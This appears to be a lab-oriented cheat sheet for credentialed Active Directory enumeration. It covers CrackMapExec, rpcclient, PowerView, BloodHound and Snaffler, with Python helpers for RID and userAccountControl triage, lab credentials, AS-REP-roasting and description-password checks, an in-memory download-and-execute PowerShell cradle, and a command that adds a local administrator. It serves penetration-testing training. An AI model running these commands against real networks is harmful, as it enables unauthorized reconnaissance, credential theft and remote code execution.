# Credentialed Enumeration

## Credentialed Enumeration - Linux

### CrackMapExec

#### Domain User Enumeration

```bash
sudo crackmapexec smb <IP> -u forend -p Klmcargo2 --users
```

#### Domain Groups Enumeration

```bash
sudo crackmapexec smb <IP> -u forend -p Klmcargo2 --groups
```

#### Domain Logged On Users

```bash
sudo crackmapexec smb <IP> -u forend -p Klmcargo2 --loggedon-users
```

#### Domain Share Searching

```bash
sudo crackmapexec smb <IP> -u forend -p Klmcargo2 --shares

sudo crackmapexec smb <IP> -u forend -p Klmcargo2 -M spider_plus --share 'Department Shares'
```

### SMBMap

#### List Shares

```bash
smbmap -u forend -p Klmcargo2 -d INLANEFREIGHT.LOCAL -H <IP>
```

#### Recursive List Shares

```bash
smbmap -u forend -p Klmcargo2 -d INLANEFREIGHT.LOCAL -H <IP> -R '<share-name>' --dir-only
```

### RPCclient

#### UserEnum by RID

```bash
# Connect with domain credentials (rpcclient takes user%password with -U)
rpcclient -U 'forend%Klmcargo2' -W INLANEFREIGHT.LOCAL <IP>

# Inside the rpcclient prompt: look up a single account by its RID (hex, e.g. 0x457)
rpcclient $> queryuser <RID>
```
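Turning `enumdomusers` output into per-RID `queryuser` calls is tedious by hand because rpcclient prints RIDs in hex and mixes built-in principals with created objects. The script below is an added example, not code from the page or from the Samba project: it parses the `user:[name] rid:[0xHEX]` lines, converts each RID, marks the well-known ones, and emits the follow-up `queryuser` commands. `SAMPLE_OUTPUT` is constructed to mimic a real `enumdomusers` listing; `sid_for_rid` assumes you already have the domain SID (for example from rpcclient's `lsaquery`).

```python
"""Parse rpcclient `enumdomusers` output and prepare per-RID follow-up queries.

Added example, not code from the page or from the Samba project. SAMPLE_OUTPUT
is constructed and follows the line format rpcclient prints for `enumdomusers`.
"""
import re

# One enumdomusers line, e.g.  user:[forend] rid:[0x457]
ENUM_LINE = re.compile(r"user:\[(?P<name>[^\]]+)\]\s+rid:\[(?P<rid>0x[0-9a-fA-F]+)\]")

# Well-known relative identifiers that exist in every domain.
WELL_KNOWN_RIDS = {
    500: "Administrator",
    501: "Guest",
    502: "krbtgt",
    512: "Domain Admins",
    513: "Domain Users",
    519: "Enterprise Admins",
}

# Constructed sample of what `rpcclient $> enumdomusers` returns.
SAMPLE_OUTPUT = """\
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[forend] rid:[0x457]
user:[svc_backup] rid:[0x458]
"""


def parse_enumdomusers(text):
    """Return one record per user line, with the RID in both hex and decimal."""
    users = []
    for match in ENUM_LINE.finditer(text):
        rid = int(match.group("rid"), 16)
        users.append({
            "name": match.group("name"),
            "rid": rid,
            "rid_hex": hex(rid),
            # RIDs below 1000 are reserved for built-in principals; the RID pool
            # allocates 1000 and up to objects created after the domain was built.
            "builtin": rid < 1000,
            "note": WELL_KNOWN_RIDS.get(rid),
        })
    return users


def sid_for_rid(domain_sid, rid):
    """Build a principal SID from the domain SID (e.g. from `lsaquery`) and a RID."""
    return f"{domain_sid}-{rid}"


def queryuser_commands(users, include_builtin=True):
    """Emit rpcclient `queryuser` commands in the hex form rpcclient expects."""
    return [f"queryuser {u['rid_hex']}" for u in users
            if include_builtin or not u["builtin"]]


if __name__ == "__main__":
    parsed = parse_enumdomusers(SAMPLE_OUTPUT)
    for u in parsed:
        label = u["note"] or ("built-in" if u["builtin"] else "created object")
        print(f"{u['name']:<16} rid={u['rid']:<5} ({u['rid_hex']}) {label}")
    print("\n".join(queryuser_commands(parsed, include_builtin=False)))
```

Feed it the saved output of a real `enumdomusers` run and paste the generated `queryuser` lines back into the rpcclient prompt; filtering out built-in RIDs keeps the noise down when the domain has hundreds of accounts.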

### WindapSearch

#### Search Domain Admins

```bash
python3 windapsearch.py --dc-ip 172.16.5.5 -u forend@inlanefreight.local -p Klmcargo2 --da
```

#### Search Privileged Users

```bash
python3 windapsearch.py --dc-ip 172.16.5.5 -u forend@inlanefreight.local -p Klmcargo2 -PU
```

### BloodHound-py

#### Enumerating Everything

```bash
sudo bloodhound-python -u 'forend' -p 'Klmcargo2' -ns 172.16.5.5 -d inlanefreight.local -c all
```

## Credentialed Enumeration - Windows

### Active Directory PowerShell Module

```powershell
# Import Module
Import-Module ActiveDirectory
```

#### Domain Info

```powershell
Get-ADDomain
```

#### Users Info

```powershell
# -Filter or -Identity is required; "*" returns every user object
Get-ADUser -Filter *
```

#### Trust Relations

```powershell
Get-ADTrust -Filter *
```

#### Group Info

```powershell
Get-ADGroup -Filter * | select name
```

#### Detailed Group Info

```powershell
Get-ADGroup -Identity <group-name>
```

#### Group Membership

```powershell
Get-ADGroupMember -Identity <group-name>
```

### PowerView

#### Domain Information

```powershell
Get-Domain
```

#### Show Domain Controller

```powershell
Get-DomainController
```

#### Show all Users

```powershell
Get-DomainUser
```

#### Show All Computers

```powershell
Get-DomainComputer
```

#### Show all Groups

```powershell
Get-DomainGroup
```

#### Show OU objects in AD

```powershell
Get-DomainOU
```

#### Show interesting ACLs (modification rights held by non-built-in principals)

```powershell
Find-InterestingDomainAcl
```

#### Show members of a specific domain group

```powershell
Get-DomainGroupMember -Identity "<group-name>"
```

#### Show all GPO

```powershell
Get-DomainGPO
```

#### Show User GPO Rights

```powershell
# Resolve the SID of the principal to check (replace "Domain Users" with the user or group of interest)
$sid = Convert-NameToSid "Domain Users"

# List GPOs whose ACL grants that SID any rights
Get-DomainGPO | Get-ObjectAcl | ?{$_.SecurityIdentifier -eq $sid}
```

#### Show Domain Policy

```powershell
Get-DomainPolicy
```

#### Show Local Groups

```powershell
Get-NetLocalGroup
```

#### Show members of a specific local group

```powershell
Get-NetLocalGroupMember -GroupName "<local-group-name>"
```

#### Find interesting files on domain shares

```powershell
Find-InterestingDomainShareFile
```

#### Find machines where the current user has local admin access

```powershell
Find-LocalAdminAccess
```

#### Show Domain Trust

```powershell
Get-DomainTrust 
```

#### Show all forest trusts for the current forest or a specified forest

```powershell
Get-ForestTrust
```

#### Map all reachable domain trusts

```powershell
Get-DomainTrustMapping
```

#### Find Passwords in User Description Fields

```powershell
Get-DomainUser * | Select-Object samaccountname,description | Where-Object {$_.Description -ne $null}
```

#### Find PASSWD\_NOTREQD Accounts

```powershell
# PASSWD_NOTREQD exempts the account from the password policy, so it may have a blank password
Get-DomainUser -UACFilter PASSWD_NOTREQD | Select-Object samaccountname,useraccountcontrol
```

#### Find DONT\_REQ\_PREAUTH Accounts

```powershell
# Accounts that do not require Kerberos pre-authentication are candidates for AS-REP roasting
Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl
```
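The three checks above (credentials in description fields, `PASSWD_NOTREQD`, `DONT_REQ_PREAUTH`) all come down to reading the `userAccountControl` bitmask and the `description` attribute of each user. The script below is an added example, not code from the page or from PowerView: it decodes the bitmask into the flag names PowerView's `-UACFilter` uses, applies the three checks to a list of user records, and notes when a flagged account is disabled (a disabled `DONT_REQ_PREAUTH` account cannot be AS-REP roasted until someone re-enables it). `SAMPLE_USERS` is constructed to mimic the `samaccountname`, `useraccountcontrol` and `description` columns that `Get-DomainUser` returns; the credential regex is a heuristic and will produce false positives.

```python
"""Offline triage of userAccountControl values and description fields.

Added example, not code from the page or from PowerView. SAMPLE_USERS is
constructed and mimics the attributes Get-DomainUser returns.
"""
import re

# userAccountControl bit flags as defined by Microsoft (ADS_USER_FLAG_ENUM).
UAC_FLAGS = {
    0x00000002: "ACCOUNTDISABLE",
    0x00000020: "PASSWD_NOTREQD",
    0x00000200: "NORMAL_ACCOUNT",
    0x00010000: "DONT_EXPIRE_PASSWORD",
    0x00040000: "SMARTCARD_REQUIRED",
    0x00080000: "TRUSTED_FOR_DELEGATION",
    0x00200000: "USE_DES_KEY_ONLY",
    0x00400000: "DONT_REQ_PREAUTH",
    0x01000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",
}

# Heuristic for credentials left in description fields; expect some noise.
CRED_HINT = re.compile(r"\b(pass(?:word|wd)?|pwd|cred(?:ential)?s?)\b\s*[:=]?\s*\S+",
                       re.IGNORECASE)

# Constructed sample records (decimal userAccountControl, as LDAP stores it).
SAMPLE_USERS = [
    {"samaccountname": "forend", "useraccountcontrol": 512, "description": None},
    {"samaccountname": "svc_backup", "useraccountcontrol": 66048,
     "description": "Backup service - pwd: Backup2020!"},
    {"samaccountname": "sqlsvc", "useraccountcontrol": 4194816,
     "description": "SQL service account"},
    {"samaccountname": "guest", "useraccountcontrol": 546, "description": "Built-in guest"},
    {"samaccountname": "krbtgt", "useraccountcontrol": 514,
     "description": "Key Distribution Center Service Account"},
]


def decode_uac(value):
    """Return the flag names set in a userAccountControl integer, lowest bit first."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def triage_users(users):
    """Apply the description, PASSWD_NOTREQD and DONT_REQ_PREAUTH checks.

    Returns one entry per account that has at least one finding, in input order.
    """
    results = []
    for user in users:
        flags = decode_uac(int(user["useraccountcontrol"]))
        disabled = "ACCOUNTDISABLE" in flags
        findings = []
        if "PASSWD_NOTREQD" in flags:
            findings.append("PASSWD_NOTREQD: exempt from password policy, blank password possible")
        if "DONT_REQ_PREAUTH" in flags:
            # The flag is still visible on a disabled account, but the KDC refuses
            # to issue a ticket for it, so roasting only works once it is enabled.
            suffix = " (account disabled, not roastable right now)" if disabled else ""
            findings.append("DONT_REQ_PREAUTH: AS-REP roastable" + suffix)
        description = user.get("description") or ""
        if CRED_HINT.search(description):
            findings.append(f"description may hold a credential: {description!r}")
        if findings:
            results.append({
                "samaccountname": user["samaccountname"],
                "disabled": disabled,
                "flags": flags,
                "findings": findings,
            })
    return results


if __name__ == "__main__":
    for entry in triage_users(SAMPLE_USERS):
        state = "disabled" if entry["disabled"] else "enabled"
        print(f"{entry['samaccountname']} ({state}) flags={','.join(entry['flags'])}")
        for finding in entry["findings"]:
            print(f"  - {finding}")
```

To run it against real data, export `samaccountname,useraccountcontrol,description` from `Get-DomainUser` (or from `windapsearch`/`ldapsearch` on Linux) and build the `users` list from that; the decoder also exposes the delegation flags, which are worth a look while you are already reading the bitmask.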

### Snaffler

<https://github.com/SnaffCon/Snaffler>

Snaffler helps acquire credentials or other sensitive data in an Active Directory environment. It works by obtaining a list of hosts within the domain and then enumerating those hosts for shares and readable directories, flagging files that match its rules.

```powershell
Snaffler.exe -s -d inlanefreight.local -o snaffler.log -v data
```

### Credentialed Enumeration With Built-In Tools

#### Basic Enumeration Commands

```powershell
# Prints the PC's name
hostname

# Prints the OS version and revision level
[System.Environment]::OSVersion.Version

# Prints the patches and hotfixes applied to the host (wmic is deprecated on current builds; Get-HotFix returns the same data)
wmic qfe get Caption,Description,HotFixID,InstalledOn
```

#### PowerShell Enumeration Commands

```powershell
# Lists the modules currently loaded for use
Get-Module

# Prints the execution policy setting for each scope on the host
Get-ExecutionPolicy -List

# Changes the policy for the current process only (-Scope Process); it reverts when the process exits, so no permanent change is left on the host
Set-ExecutionPolicy Bypass -Scope Process

# Returns environment values such as key paths, users, computer information, etc.
Get-ChildItem Env: | ft Key,Value

# Downloads a script with PowerShell and executes it in memory without writing it to disk
powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('URL to download the file from'); <follow-on commands>"

# Firewall status for all profiles
netsh advfirewall show allprofiles

# Windows Defender status
Get-MpComputerStatus
```

#### Net Commands

```powershell
# Local password requirements
net accounts

# Domain password and lockout policy
net accounts /domain

# List all domain groups
net group /domain

# List members of Domain Admins
net group "Domain Admins" /domain

# List computer accounts joined to the domain
net group "domain computers" /domain

# List the computer accounts of the domain controllers
net group "Domain Controllers" /domain

# List the users that belong to a given domain group
net group <domain_group_name> /domain

# List of domain groups (same as net group /domain)
net groups /domain

# List members of the Administrators group on the domain controller (Domain Admins is a member by default)
net localgroup administrators /domain

# Add a user to the local Administrators group (this modifies the host, it is not enumeration)
net localgroup administrators [username] /add

# Shares currently offered by this host
net share

# Information about a user within the domain
net user <ACCOUNT_NAME> /domain

# List all users in the domain
net user /domain

# List computers visible on the network (add /domain for the whole domain)
net view
```
